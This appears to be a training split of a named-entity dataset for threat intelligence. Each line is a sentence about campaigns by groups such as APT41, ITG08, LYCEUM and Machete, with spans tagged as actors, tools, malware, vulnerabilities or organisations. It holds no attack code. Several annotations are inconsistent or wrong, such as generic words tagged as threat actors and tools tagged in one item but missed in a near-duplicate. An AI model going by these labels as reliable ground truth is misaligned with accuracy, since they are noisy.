{"text": "APT41 has also been observed modifying firewall rules to enable file and printer sharing to allow for inbound Server Message Block (SMB) traffic .", "spans": {"THREAT_ACTOR: APT41": [[0, 5]]}, "info": {"id": "dnrti_train_003097", "source": "dnrti_train"}}
{"text": "The group also deploys the SOGU and CROSSWALK malware families as means to maintain presence .", "spans": {"THREAT_ACTOR: group": [[4, 9]]}, "info": {"id": "dnrti_train_003099", "source": "dnrti_train"}}
{"text": "APT41 sent spear-phishing emails to multiple HR employees three days after the compromise had been remediated and systems were brought back online .", "spans": {"THREAT_ACTOR: APT41": [[0, 5]]}, "info": {"id": "dnrti_train_003100", "source": "dnrti_train"}}
{"text": "APT41 also deploys the SOGU and CROSSWALK malware families as means to maintain presence .", "spans": {"THREAT_ACTOR: APT41": [[0, 5]], "TOOL: SOGU": [[23, 27]], "TOOL: CROSSWALK": [[32, 41]]}, "info": {"id": "dnrti_train_003101", "source": "dnrti_train"}}
{"text": "Within hours of a user opening the malicious attachment dropping a HOMEUNIX backdoor , APT41 regained a foothold within the environment by installing PHOTO on the organization's servers across multiple geographic regions .", "spans": {"TOOL: HOMEUNIX backdoor": [[67, 84]], "THREAT_ACTOR: APT41": [[87, 92]], "TOOL: PHOTO": [[150, 155]]}, "info": {"id": "dnrti_train_003102", "source": "dnrti_train"}}
{"text": "Before attempting to deploy the publicly available Ransomware-as-a-Service (RaaS) Encryptor RaaS through group policy , APT41 blocked victim systems from retrieving anti-virus updates by accessing the DNS management console and implementing a forward lookup on the domain used for anti-virus updates to the park IP address 1.1.1.1 .", "spans": {"THREAT_ACTOR: APT41": [[120, 125]]}, "info": {"id": "dnrti_train_003103", "source": "dnrti_train"}}
{"text": "APT41 has been observed creating a RAR archive of targeted files for exfiltration .", "spans": {"THREAT_ACTOR: APT41": [[0, 5]]}, "info": {"id": "dnrti_train_003104", "source": "dnrti_train"}}
{"text": "APT41 is unique among tracked China-based actors in that it leverages non-public malware typically reserved for espionage campaigns in what appears to be activity for personal gain .", "spans": {"THREAT_ACTOR: APT41": [[0, 5]]}, "info": {"id": "dnrti_train_003105", "source": "dnrti_train"}}
{"text": "During multiple engagements , APT41 attempted to remove evidence of some of its activity by deleting Bash histories , clearing Windows security and system events , and modifying DNS management to avoid anti-virus detections .", "spans": {"THREAT_ACTOR: APT41": [[30, 35]]}, "info": {"id": "dnrti_train_003106", "source": "dnrti_train"}}
{"text": "Explicit financially-motivated targeting is unusual among Chinese statesponsored threat groups , and evidence suggests APT41 has conducted simultaneous cyber crime and cyber espionage operations from 2014 onward .", "spans": {"THREAT_ACTOR: APT41": [[119, 124]]}, "info": {"id": "dnrti_train_003107", "source": "dnrti_train"}}
{"text": "APT41 operations against higher education , travel services , and news/media firms provide some indication that the group also tracks individuals and conducts surveillance .", "spans": {"THREAT_ACTOR: APT41": [[0, 5]]}, "info": {"id": "dnrti_train_003108", "source": "dnrti_train"}}
{"text": "For example , the group has repeatedly targeted call record information at telecom companies .", "spans": {"THREAT_ACTOR: group": [[18, 23]], "ORGANIZATION: telecom": [[75, 82]], "ORGANIZATION: companies": [[83, 92]]}, "info": {"id": "dnrti_train_003109", "source": "dnrti_train"}}
{"text": "APT41 has established and maintained strategic access to organizations in the healthcare , high-tech , and telecommunications sectors .", "spans": {"THREAT_ACTOR: APT41": [[0, 5]]}, "info": {"id": "dnrti_train_003110", "source": "dnrti_train"}}
{"text": "The group’s financially motivated activity has primarily focused on the video game industry , where APT41 has manipulated virtual currencies and even attempted to deploy ransomware .", "spans": {"ORGANIZATION: video game industry": [[72, 91]], "THREAT_ACTOR: APT41": [[100, 105]]}, "info": {"id": "dnrti_train_003111", "source": "dnrti_train"}}
{"text": "These supply chain compromise tactics have also been characteristic of APT41’s best known and most recent espionage campaigns .", "spans": {"THREAT_ACTOR: APT41’s": [[71, 78]]}, "info": {"id": "dnrti_train_003113", "source": "dnrti_train"}}
{"text": "Interestingly , despite the significant effort required to execute supply chain compromises and the large number of affected organizations , APT41 limits the deployment of follow-on malware to specific victim systems by matching against individual system identifiers .", "spans": {"THREAT_ACTOR: APT41": [[141, 146]]}, "info": {"id": "dnrti_train_003114", "source": "dnrti_train"}}
{"text": "Mapping the group’s activities since 2012 (Figure 2) also provides some indication that APT41 primarily conducts financially motivated operations outside of their normal day jobs .", "spans": {"THREAT_ACTOR: APT41": [[88, 93]]}, "info": {"id": "dnrti_train_003115", "source": "dnrti_train"}}
{"text": "The latter is especially notable because APT41 has repeatedly returned to targeting the video game industry and we believe these activities were formative in the group’s later espionage operations .", "spans": {"THREAT_ACTOR: APT41": [[41, 46]]}, "info": {"id": "dnrti_train_003116", "source": "dnrti_train"}}
{"text": "APT41 leverages an arsenal of over 46 different malware families and tools to accomplish their missions , including publicly available utilities , malware shared with other Chinese espionage operations , and tools unique to the group .", "spans": {"THREAT_ACTOR: APT41": [[0, 5]], "TOOL: malware families": [[48, 64]], "TOOL: tools": [[69, 74]], "THREAT_ACTOR: group": [[228, 233]]}, "info": {"id": "dnrti_train_003117", "source": "dnrti_train"}}
{"text": "Once in a victim organization , APT41 can leverage more sophisticated TTPs and deploy additional malware .", "spans": {"THREAT_ACTOR: APT41": [[32, 37]]}, "info": {"id": "dnrti_train_003118", "source": "dnrti_train"}}
{"text": "APT41 often relies on spear-phishing emails with attachments such as compiled HTML (.chm) files to initially compromise their victims .", "spans": {"THREAT_ACTOR: APT41": [[0, 5]]}, "info": {"id": "dnrti_train_003119", "source": "dnrti_train"}}
{"text": "APT41 has also deployed rootkits and Master Boot Record (MBR) bootkits on a limited basis to hide their malware and maintain persistence on select victim systems .", "spans": {"THREAT_ACTOR: APT41": [[0, 5]]}, "info": {"id": "dnrti_train_003120", "source": "dnrti_train"}}
{"text": "Like other Chinese espionage operators , APT41 appears to have moved toward strategic intelligence collection and establishing access and away from direct intellectual property theft since 2015 .", "spans": {"THREAT_ACTOR: APT41": [[41, 46]]}, "info": {"id": "dnrti_train_003122", "source": "dnrti_train"}}
{"text": "This shift , however , has not affected the group's consistent interest in targeting the video game industry for financially motivated reasons .", "spans": {"THREAT_ACTOR: group's": [[44, 51]]}, "info": {"id": "dnrti_train_003123", "source": "dnrti_train"}}
{"text": "With the contents of the emails , included links and decoy PDFs all involving taxes , the attackers are apparently targeting the financial departments of organizations in the Balkans region .", "spans": {"THREAT_ACTOR: attackers": [[90, 99]]}, "info": {"id": "dnrti_train_003125", "source": "dnrti_train"}}
{"text": "Some parts of the campaign were briefly described by a Serbian security provider in 2016 and the Croatian CERT in 2017 .", "spans": {"ORGANIZATION: Serbian security": [[55, 71]]}, "info": {"id": "dnrti_train_003126", "source": "dnrti_train"}}
{"text": "The campaign has been active at least from January 2016 to the time of writing the most recent detections in our telemetry are from July 2019 .", "spans": {}, "info": {"id": "dnrti_train_003127", "source": "dnrti_train"}}
{"text": "Our findings show that the mentioned attacks have been orchestrated and we consider them a single long-term campaign that spans Croatia , Serbia , Montenegro , and Bosnia and Herzegovina .", "spans": {"THREAT_ACTOR: attacks": [[37, 44]]}, "info": {"id": "dnrti_train_003128", "source": "dnrti_train"}}
{"text": "We’ve discovered a new version of BalkanDoor with a new method for execution/installation: an exploit of the WinRAR ACE vulnerability CVE-2018-20250 .", "spans": {"THREAT_ACTOR: BalkanDoor": [[34, 44]], "VULNERABILITY: CVE-2018-20250": [[134, 148]]}, "info": {"id": "dnrti_train_003129", "source": "dnrti_train"}}
{"text": "Both BalkanRAT and BalkanDoor spread in Croatia , Serbia , Montenegro , and Bosnia and Herzegovina .", "spans": {"MALWARE: BalkanRAT": [[5, 14]], "MALWARE: BalkanDoor": [[19, 29]]}, "info": {"id": "dnrti_train_003130", "source": "dnrti_train"}}
{"text": "According to our telemetry , the campaign spreading these tools has been live since 2016 , with the most recent detections as late as in July 2019 .", "spans": {}, "info": {"id": "dnrti_train_003131", "source": "dnrti_train"}}
{"text": "Via the BalkanDoor backdoor , the attacker sends a backdoor command to unlock the screen… and using BalkanRAT , they can do whatever they want on the computer .", "spans": {"THREAT_ACTOR: attacker": [[34, 42]], "TOOL: BalkanRAT": [[100, 109]]}, "info": {"id": "dnrti_train_003133", "source": "dnrti_train"}}
{"text": "The BalkanDoor backdoor does not implement any exfiltration channel .", "spans": {"TOOL: BalkanDoor": [[4, 14]], "TOOL: backdoor": [[15, 23]]}, "info": {"id": "dnrti_train_003134", "source": "dnrti_train"}}
{"text": "APT41 leveraged ADORE.XSEC , a Linux backdoor launched by the Adore-NG rootkit , throughout an organization's Linux environment .", "spans": {"THREAT_ACTOR: APT41": [[0, 5]], "TOOL: ADORE.XSEC": [[16, 26]]}, "info": {"id": "dnrti_train_003135", "source": "dnrti_train"}}
{"text": "The main part of the BalkanRAT malware is a copy of the Remote Utilities software for remote access .", "spans": {"MALWARE: BalkanRAT malware": [[21, 38]]}, "info": {"id": "dnrti_train_003137", "source": "dnrti_train"}}
{"text": "Interestingly , some of the APT41's POISONPLUG malware samples leverage the Steam Community website associated with Valve , a video game developer and publisher .", "spans": {"THREAT_ACTOR: APT41's": [[28, 35]], "TOOL: POISONPLUG": [[36, 46]]}, "info": {"id": "dnrti_train_003138", "source": "dnrti_train"}}
{"text": "The campaign targeting accountants in the Balkans shows some similarities with a campaign aimed at Ukrainian notaries reported in 2016 .", "spans": {}, "info": {"id": "dnrti_train_003139", "source": "dnrti_train"}}
{"text": "Based on the Let’s Encrypt certificate issuance date , we believe this campaign to be active from May 2019 .", "spans": {"ORGANIZATION: Encrypt": [[19, 26]]}, "info": {"id": "dnrti_train_003140", "source": "dnrti_train"}}
{"text": "One of the domains uncovered during the investigation was identified by the Chinese security vendor CERT 360 as being part of the BITTER APT campaign in May 2019 .", "spans": {"ORGANIZATION: CERT 360": [[100, 108]], "THREAT_ACTOR: BITTER APT": [[130, 140]]}, "info": {"id": "dnrti_train_003141", "source": "dnrti_train"}}
{"text": "Further analysis of the BITTER APT’s infrastructure uncovered a broader phishing campaign targeting other government sites and state-owned enterprises in China .", "spans": {"THREAT_ACTOR: BITTER APT’s": [[24, 36]]}, "info": {"id": "dnrti_train_003142", "source": "dnrti_train"}}
{"text": "Further investigation revealed approximately 40 additional sites , all of which appear to be targeting the government of China and other organisations in China .", "spans": {}, "info": {"id": "dnrti_train_003143", "source": "dnrti_train"}}
{"text": "We expect to see BITTER APT continuing to target the government of China by employing spoofed login pages designed to steal user credentials and obtain access to privileged account information .", "spans": {"THREAT_ACTOR: BITTER APT": [[17, 27]]}, "info": {"id": "dnrti_train_003144", "source": "dnrti_train"}}
{"text": "This domain and IP address has been previously associated with the BITTER APT and targeting government agencies in China with phishing attacks , based on reporting from 360-CERT .", "spans": {"THREAT_ACTOR: BITTER APT": [[67, 77]], "ORGANIZATION: 360-CERT": [[169, 177]]}, "info": {"id": "dnrti_train_003145", "source": "dnrti_train"}}
{"text": "BITTER APT campaigns are primarily targeting China , Pakistan and Saudi Arabia historically .", "spans": {"THREAT_ACTOR: BITTER APT": [[0, 10]]}, "info": {"id": "dnrti_train_003147", "source": "dnrti_train"}}
{"text": "As part of its ongoing research initiatives , the Anomali Threat Research Team has discovered a new phishing attack leveraging spoof sites that seem to be designed to steal email credentials from the target victims within the government of the People’s Republic of China .", "spans": {"ORGANIZATION: Anomali": [[50, 57]]}, "info": {"id": "dnrti_train_003148", "source": "dnrti_train"}}
{"text": "360 Threat Intelligence Center has reported on related indicators being attributed to BITTER APT a South Asian country suspected Indian APT in open source reporting .", "spans": {"ORGANIZATION: 360 Threat Intelligence Center": [[0, 30]], "THREAT_ACTOR: BITTER APT": [[86, 96]]}, "info": {"id": "dnrti_train_003149", "source": "dnrti_train"}}
{"text": "China Chopper is a tool that has been used by some state-sponsored actors such as Leviathan and Threat Group-3390 , but during our investigation we've seen actors with varying skill levels .", "spans": {"TOOL: China Chopper": [[0, 13]], "THREAT_ACTOR: Leviathan": [[82, 91]], "THREAT_ACTOR: Threat Group-3390": [[96, 113]]}, "info": {"id": "dnrti_train_003150", "source": "dnrti_train"}}
{"text": "Cisco Talos discovered significant China Chopper activity over a two-year period beginning in June 2017 , which shows that even nine years after its creation , attackers are using China Chopper without significant modifications .", "spans": {"ORGANIZATION: Cisco Talos": [[0, 11]], "TOOL: China Chopper": [[35, 48], [180, 193]], "THREAT_ACTOR: attackers": [[160, 169]]}, "info": {"id": "dnrti_train_003152", "source": "dnrti_train"}}
{"text": "Here , we investigate a campaign targeting an Asian government organization .", "spans": {"ORGANIZATION: government organization": [[52, 75]]}, "info": {"id": "dnrti_train_003153", "source": "dnrti_train"}}
{"text": "We observed another campaign targeting an organisation located in Lebanon .", "spans": {}, "info": {"id": "dnrti_train_003154", "source": "dnrti_train"}}
{"text": "They download and install an archive containing executables and trivially modified source code of the password-stealing tool Mimikatz Lite as GetPassword.exe .", "spans": {"MALWARE: Mimikatz Lite": [[125, 138]], "MALWARE: GetPassword.exe": [[142, 157]]}, "info": {"id": "dnrti_train_003156", "source": "dnrti_train"}}
{"text": "The actor attempts to exploit CVE-2018–8440 — an elevation of privilege vulnerability in Windows when it improperly handles calls to Advanced Local Procedure Call — to elevate the privileges using a modified proof-of-concept exploit .", "spans": {"THREAT_ACTOR: actor": [[4, 9]], "VULNERABILITY: CVE-2018–8440": [[30, 43]], "VULNERABILITY: vulnerability": [[72, 85]], "VULNERABILITY: proof-of-concept": [[208, 224]], "VULNERABILITY: exploit": [[225, 232]]}, "info": {"id": "dnrti_train_003158", "source": "dnrti_train"}}
{"text": "The attacker obtains the required privileges and launches a few other tools to modify the access control lists (ACLs) of all websites running on the affected server .", "spans": {"THREAT_ACTOR: attacker": [[4, 12]]}, "info": {"id": "dnrti_train_003159", "source": "dnrti_train"}}
{"text": "The Windows branch of the Cloud Atlas intrusion set still uses spear-phishing emails to target high profile victims .", "spans": {"THREAT_ACTOR: Cloud Atlas": [[26, 37]]}, "info": {"id": "dnrti_train_003160", "source": "dnrti_train"}}
{"text": "From the beginning of 2019 until July , we have been able to identify different spear-phishing campaigns related to this threat actor mostly focused on Russia , Central Asia and regions of Ukraine with ongoing military conflicts .", "spans": {"THREAT_ACTOR: threat actor": [[121, 133]]}, "info": {"id": "dnrti_train_003161", "source": "dnrti_train"}}
{"text": "We described one of the techniques used by Cloud Atlas in 2017 and our colleagues at Palo Alto Networks also wrote about it in November 2018 .", "spans": {"THREAT_ACTOR: Cloud Atlas": [[43, 54]], "ORGANIZATION: Palo Alto": [[85, 94]]}, "info": {"id": "dnrti_train_003162", "source": "dnrti_train"}}
{"text": "Previously , Cloud Atlas dropped its validator” implant named PowerShower” directly , after exploiting the Microsoft Equation vulnerability CVE-2017-11882 mixed with CVE-2018-0802 .", "spans": {"THREAT_ACTOR: Cloud Atlas": [[13, 24]], "VULNERABILITY: CVE-2017-11882": [[140, 154]], "VULNERABILITY: CVE-2018-0802": [[166, 179]]}, "info": {"id": "dnrti_train_003164", "source": "dnrti_train"}}
{"text": "This malware has been used since October 2018 by Cloud Atlas as a validator and now as a second stage .", "spans": {"THREAT_ACTOR: Cloud Atlas": [[49, 60]]}, "info": {"id": "dnrti_train_003165", "source": "dnrti_train"}}
{"text": "Cloud Atlas remains very prolific in Eastern Europe and Central Asia .", "spans": {"THREAT_ACTOR: Cloud Atlas": [[0, 11]]}, "info": {"id": "dnrti_train_003166", "source": "dnrti_train"}}
{"text": "During its recent campaigns , Cloud Atlas used a new polymorphic” infection chain relying no more on PowerShower directly after infection , but executing a polymorphic HTA hosted on a remote server , which is used to drop three different files on the local system .", "spans": {"THREAT_ACTOR: Cloud Atlas": [[30, 41]]}, "info": {"id": "dnrti_train_003167", "source": "dnrti_train"}}
{"text": "The Gamaredon Group has been actively launching spear-phishing attacks against Ukrainian government and military departments from the mid-2013s .", "spans": {"THREAT_ACTOR: Gamaredon Group": [[4, 19]]}, "info": {"id": "dnrti_train_003168", "source": "dnrti_train"}}
{"text": "In addition , the anonymous cybersecurity experts referenced in the article connected the malicious Gamaredon Group actors with Russian state-sponsored hackers .", "spans": {"THREAT_ACTOR: Gamaredon Group": [[100, 115]]}, "info": {"id": "dnrti_train_003169", "source": "dnrti_train"}}
{"text": "In one article published in the Kharkiv Observer – an independent Ukranian online publication – an unnamed source stated that even the Ukrainian Presidential Administration has been attacked by malware developed by the Gamaredon Group .", "spans": {"THREAT_ACTOR: Gamaredon Group": [[219, 234]]}, "info": {"id": "dnrti_train_003170", "source": "dnrti_train"}}
{"text": "Gamaredon Group primarily target Ukrainian organizations and resources using spear-phishing attacks , and they use military or similar documents as bait .", "spans": {"THREAT_ACTOR: Gamaredon Group": [[0, 15]], "TOOL: documents": [[135, 144]]}, "info": {"id": "dnrti_train_003171", "source": "dnrti_train"}}
{"text": "Once they have found a victim , they then deploy remote manipulation system binaries (RMS) via self-extracting archives and batch command files .", "spans": {"THREAT_ACTOR: they": [[5, 9]], "TOOL: (RMS)": [[85, 90]]}, "info": {"id": "dnrti_train_003172", "source": "dnrti_train"}}
{"text": "During a recent incident response investigation , our team identified new attacks by the financially motivated attack group ITG08 , also known as FIN6 .", "spans": {"THREAT_ACTOR: ITG08": [[124, 129]], "THREAT_ACTOR: FIN6": [[146, 150]]}, "info": {"id": "dnrti_train_003174", "source": "dnrti_train"}}
{"text": "More recently , ITG08 has been observed targeting e-commerce environments by injecting malicious code into online checkout pages of compromised websites — a technique known as online skimming — thereby stealing payment card data transmitted to the vendor by unsuspecting customers .", "spans": {"THREAT_ACTOR: ITG08": [[16, 21]]}, "info": {"id": "dnrti_train_003175", "source": "dnrti_train"}}
{"text": "This tool , a TTP observed in ITG08 attacks since 2018 , is sold on the dark web by an underground malware-as-a-service (MaaS) provider .", "spans": {"THREAT_ACTOR: ITG08": [[30, 35]]}, "info": {"id": "dnrti_train_003176", "source": "dnrti_train"}}
{"text": "ITG08 is an organized cybercrime gang that has been active since 2015 , mostly targeting pointof-sale (POS) machines in brick-and-mortar retailers and companies in the hospitality sector in the U.S. and Europe .", "spans": {"THREAT_ACTOR: ITG08": [[0, 5]]}, "info": {"id": "dnrti_train_003177", "source": "dnrti_train"}}
{"text": "Past campaigns by ITG08 using the More_eggs backdoor were last reported in February 2019 .", "spans": {"THREAT_ACTOR: ITG08": [[18, 23]], "TOOL: More_eggs backdoor": [[34, 52]]}, "info": {"id": "dnrti_train_003178", "source": "dnrti_train"}}
{"text": "Attackers use it to create , expand and cement their foothold in compromised environments .", "spans": {"THREAT_ACTOR: Attackers": [[0, 9]]}, "info": {"id": "dnrti_train_003179", "source": "dnrti_train"}}
{"text": "Lastly , ITG08 used Comodo code-signing certificates several times during the course of the campaign .", "spans": {"THREAT_ACTOR: ITG08": [[9, 14]], "TOOL: Comodo code-signing certificates": [[20, 52]]}, "info": {"id": "dnrti_train_003180", "source": "dnrti_train"}}
{"text": "Let’s take a closer look at ITG08’s TTPs that are relevant to the campaign we investigated , starting with its spear phishing and intrusion tactics and covering information on its use of the More_eggs backdoor .", "spans": {"THREAT_ACTOR: ITG08’s": [[28, 35]], "MALWARE: More_eggs backdoor": [[191, 209]]}, "info": {"id": "dnrti_train_003181", "source": "dnrti_train"}}
{"text": "X-Force IRIS determined that the More_eggs backdoor later downloaded additional files , including a signed binary shellcode loader and a signed Dynamic Link Library (DLL) , as described below , to create a reverse shell and connect to a remote host .", "spans": {"ORGANIZATION: X-Force IRIS": [[0, 12]], "MALWARE: More_eggs backdoor": [[33, 51]]}, "info": {"id": "dnrti_train_003183", "source": "dnrti_train"}}
{"text": "Once the ITG08 established a foothold on the network , they employed WMI and PowerShell techniques to perform network reconnaissance and move laterally within the environment .", "spans": {"THREAT_ACTOR: ITG08": [[9, 14]], "TOOL: WMI": [[69, 72]], "TOOL: PowerShell": [[77, 87]]}, "info": {"id": "dnrti_train_003184", "source": "dnrti_train"}}
{"text": "The attackers used this technique to remotely install a Metasploit reverse TCP stager on select systems , subsequently spawning a Meterpreter session and Mimikatz .", "spans": {"THREAT_ACTOR: attackers": [[4, 13]]}, "info": {"id": "dnrti_train_003185", "source": "dnrti_train"}}
{"text": "In addition to the More_eggs malware , ITG08 leveraged in-memory attacks by injecting malicious code , in this case Mimikatz , into legitimate system processes .", "spans": {"TOOL: More_eggs": [[19, 28]], "THREAT_ACTOR: ITG08": [[39, 44]], "TOOL: Mimikatz": [[116, 124]]}, "info": {"id": "dnrti_train_003186", "source": "dnrti_train"}}
{"text": "A recently rising attack tool in ITG08 campaigns has been the More_eggs JScript backdoor .", "spans": {"THREAT_ACTOR: ITG08": [[33, 38]], "TOOL: More_eggs JScript backdoor": [[62, 88]]}, "info": {"id": "dnrti_train_003187", "source": "dnrti_train"}}
{"text": "After a successful phishing attack in which users have opened emails and browsed to malicious links , ITG08 attackers install the More_eggs JScript backdoor on user devices alongside several other malware components .", "spans": {"THREAT_ACTOR: ITG08": [[102, 107]], "TOOL: More_eggs JScript backdoor": [[130, 156]]}, "info": {"id": "dnrti_train_003189", "source": "dnrti_train"}}
{"text": "Beyond using More_eggs as a backdoor , ITG08 in this campaign also used offensive security tools and PowerShell scripts to carry out the different stages of the attack .", "spans": {"TOOL: More_eggs": [[13, 22]], "THREAT_ACTOR: ITG08": [[39, 44]], "TOOL: offensive security tools": [[72, 96]], "TOOL: PowerShell scripts": [[101, 119]]}, "info": {"id": "dnrti_train_003190", "source": "dnrti_train"}}
{"text": "After injecting Meterpreter into memory , the attacker had complete control of the infected device .", "spans": {"THREAT_ACTOR: attacker": [[46, 54]]}, "info": {"id": "dnrti_train_003191", "source": "dnrti_train"}}
{"text": "IBM X-Force IRIS has gained insight into ITG08’s intrusion methods , ability to navigate laterally , use of custom and open-source tools , and typical persistence mechanisms .", "spans": {"ORGANIZATION: IBM X-Force IRIS": [[0, 16]], "THREAT_ACTOR: ITG08’s": [[41, 48]], "TOOL: tools": [[131, 136]]}, "info": {"id": "dnrti_train_003192", "source": "dnrti_train"}}
{"text": "After the phishing email resulted in a successful infiltration , ITG08 used the More_eggs backdoor to gain a foothold and infect additional devices .", "spans": {"THREAT_ACTOR: ITG08": [[65, 70]], "TOOL: More_eggs backdoor": [[80, 98]]}, "info": {"id": "dnrti_train_003193", "source": "dnrti_train"}}
{"text": "In addition , configuring PowerShell script logging and identifying any obfuscation will assist in mitigating ITG08’s use of PowerShell to conduct malicious activity .", "spans": {"THREAT_ACTOR: ITG08’s": [[110, 117]], "TOOL: PowerShell": [[125, 135]]}, "info": {"id": "dnrti_train_003194", "source": "dnrti_train"}}
{"text": "The LYCEUM threat group targets organizations in sectors of strategic national importance , including oil and gas and possibly telecommunications .", "spans": {"THREAT_ACTOR: LYCEUM": [[4, 10]]}, "info": {"id": "dnrti_train_003195", "source": "dnrti_train"}}
{"text": "CTU research indicates that LYCEUM may have been active as early as April 2018 .", "spans": {"ORGANIZATION: CTU": [[0, 3]], "THREAT_ACTOR: LYCEUM": [[28, 34]]}, "info": {"id": "dnrti_train_003196", "source": "dnrti_train"}}
{"text": "In May 2019 , the threat group launched a campaign against oil and gas organizations in the Middle East .", "spans": {"THREAT_ACTOR: group": [[25, 30]]}, "info": {"id": "dnrti_train_003197", "source": "dnrti_train"}}
{"text": "This campaign followed a sharp uptick in development and testing of their toolkit against a public multivendor malware scanning service in February 2019 .", "spans": {}, "info": {"id": "dnrti_train_003198", "source": "dnrti_train"}}
{"text": "Stylistically , the observed tradecraft resembles activity from groups such as COBALT GYPSY (which is related to OilRig , Crambus , and APT34 and COBALT TRINITY also known as Elfin and APT33 .", "spans": {"THREAT_ACTOR: COBALT GYPSY": [[79, 91]], "THREAT_ACTOR: OilRig": [[113, 119]], "THREAT_ACTOR: Crambus": [[122, 129]], "THREAT_ACTOR: APT34": [[136, 141]], "THREAT_ACTOR: COBALT TRINITY": [[146, 160]], "THREAT_ACTOR: Elfin": [[175, 180]], "THREAT_ACTOR: APT33": [[185, 190]]}, "info": {"id": "dnrti_train_003199", "source": "dnrti_train"}}
{"text": "When CTU researchers first published information about LYCEUM to Secureworks Threat Intelligence clients , no public documentation on the group existed .", "spans": {"ORGANIZATION: CTU": [[5, 8]], "THREAT_ACTOR: LYCEUM": [[55, 61]]}, "info": {"id": "dnrti_train_003200", "source": "dnrti_train"}}
{"text": "Using compromised accounts , LYCEUM send spearphishing emails with malicious Excel attachments to deliver the DanBot malware , which subsequently deploys post-intrusion tools .", "spans": {"THREAT_ACTOR: LYCEUM": [[29, 35]], "TOOL: post-intrusion tools": [[154, 174]]}, "info": {"id": "dnrti_train_003201", "source": "dnrti_train"}}
{"text": "Get-LAPSP.ps1 is a PowerShell script that gathers account information from Active Directory via LDAP .", "spans": {"TOOL: Get-LAPSP.ps1": [[0, 13]], "TOOL: PowerShell script": [[19, 36]]}, "info": {"id": "dnrti_train_003203", "source": "dnrti_train"}}
{"text": "LYCEUM deployed this tool via DanBot shortly after gaining initial access to a compromised environment .", "spans": {"THREAT_ACTOR: LYCEUM": [[0, 6]], "TOOL: DanBot": [[30, 36]]}, "info": {"id": "dnrti_train_003204", "source": "dnrti_train"}}
{"text": "LYCEUM delivers weaponized maldocs via spearphishing from the compromised accounts to the targeted executives , human resources (HR) staff , and IT personnel .", "spans": {"THREAT_ACTOR: LYCEUM": [[0, 6]], "TOOL: maldocs": [[27, 34]]}, "info": {"id": "dnrti_train_003205", "source": "dnrti_train"}}
{"text": "This focus on training aligns with LYCEUM’s targeting of executives , HR staff , and IT personnel .", "spans": {"THREAT_ACTOR: LYCEUM’s": [[35, 43]], "ORGANIZATION: executives": [[57, 67]], "ORGANIZATION: HR staff": [[70, 78]], "ORGANIZATION: IT personnel": [[85, 97]]}, "info": {"id": "dnrti_train_003206", "source": "dnrti_train"}}
{"text": "Despite the initial perception that the maldoc sample was intended for ICS or OT staff , LYCEUM has not demonstrated an interest in those environments .", "spans": {"TOOL: maldoc": [[40, 46]], "ORGANIZATION: ICS": [[71, 74]], "ORGANIZATION: OT staff": [[78, 86]], "THREAT_ACTOR: LYCEUM": [[89, 95]]}, "info": {"id": "dnrti_train_003207", "source": "dnrti_train"}}
{"text": "However , CTU researchers cannot dismiss the possibility that the LYCEUM could seek access to OT environments after establishing robust access to the IT environment .", "spans": {"ORGANIZATION: CTU": [[10, 13]], "THREAT_ACTOR: LYCEUM": [[66, 72]]}, "info": {"id": "dnrti_train_003208", "source": "dnrti_train"}}
{"text": "LYCEUM is an emerging threat to energy organizations in the Middle East , but organizations should not assume that future targeting will be limited to this sector .", "spans": {"THREAT_ACTOR: LYCEUM": [[0, 6]]}, "info": {"id": "dnrti_train_003209", "source": "dnrti_train"}}
{"text": "Aside from deploying novel malware , LYCEUM’s activity demonstrates capabilities CTU researchers have observed from other threat groups and reinforces the value of a few key controls .", "spans": {"THREAT_ACTOR: LYCEUM’s": [[37, 45]], "ORGANIZATION: CTU": [[81, 84]]}, "info": {"id": "dnrti_train_003210", "source": "dnrti_train"}}
{"text": "Password spraying , DNS tunneling , social engineering , and abuse of security testing frameworks are common tactics , particularly from threat groups operating in the Middle East .", "spans": {"THREAT_ACTOR: groups": [[144, 150]]}, "info": {"id": "dnrti_train_003211", "source": "dnrti_train"}}
{"text": "Machete is still very active at the time of this publication , regularly introducing changes to its malware , infrastructure and spearphishing campaigns .", "spans": {"THREAT_ACTOR: Machete": [[0, 7]], "TOOL: malware": [[100, 107]]}, "info": {"id": "dnrti_train_003213", "source": "dnrti_train"}}
{"text": "ESET has been tracking a new version of Machete (the group’s Python-based toolset) that was first seen in April 2018 .", "spans": {"ORGANIZATION: ESET": [[0, 4]], "THREAT_ACTOR: Machete": [[40, 47]]}, "info": {"id": "dnrti_train_003214", "source": "dnrti_train"}}
{"text": "This extends to other countries in Latin America , with the Ecuadorean military being another organization highly targeted with the Machete malware .", "spans": {"THREAT_ACTOR: Machete": [[132, 139]]}, "info": {"id": "dnrti_train_003215", "source": "dnrti_train"}}
{"text": "Their long run of attacks , focused on Latin American countries , has allowed them to collect intelligence and refine their tactics over the years .", "spans": {"THREAT_ACTOR: Their": [[0, 5]]}, "info": {"id": "dnrti_train_003216", "source": "dnrti_train"}}
{"text": "Machete is interested in files that describe navigation routes and positioning using military grids .", "spans": {"THREAT_ACTOR: Machete": [[0, 7]]}, "info": {"id": "dnrti_train_003217", "source": "dnrti_train"}}
{"text": "The Machete group sends very specific emails directly to its victims , and these change from target to target .", "spans": {"THREAT_ACTOR: Machete": [[4, 11]]}, "info": {"id": "dnrti_train_003218", "source": "dnrti_train"}}
{"text": "The Machete group is very active and has introduced several changes to its malware since a new version was released in April 2018 .", "spans": {"THREAT_ACTOR: Machete": [[4, 11]]}, "info": {"id": "dnrti_train_003219", "source": "dnrti_train"}}
{"text": "Since August 2018 , the Machete components have been delivered with an extra layer of obfuscation .", "spans": {"THREAT_ACTOR: Machete": [[24, 31]]}, "info": {"id": "dnrti_train_003221", "source": "dnrti_train"}}
{"text": "ESET has been tracking this threat for months and has observed several changes , sometimes within weeks .", "spans": {"ORGANIZATION: ESET": [[0, 4]]}, "info": {"id": "dnrti_train_003223", "source": "dnrti_train"}}
{"text": "The presence of code to exfiltrate data to removable drives when there is physical access to a compromised computer may indicate that Machete operators could have a presence in one of the targeted countries , although we cannot be certain .", "spans": {"THREAT_ACTOR: Machete": [[134, 141]], "ORGANIZATION: we": [[218, 220]]}, "info": {"id": "dnrti_train_003225", "source": "dnrti_train"}}
{"text": "This group is very active and continues to develop new features for its malware , and implement infrastructure changes in 2019 .", "spans": {"THREAT_ACTOR: group": [[5, 10]]}, "info": {"id": "dnrti_train_003226", "source": "dnrti_train"}}
{"text": "Machete's long run of attacks , focused in Latin American countries , has allowed them to collect intelligence and refine their tactics over the years .", "spans": {"THREAT_ACTOR: Machete's": [[0, 9]]}, "info": {"id": "dnrti_train_003227", "source": "dnrti_train"}}
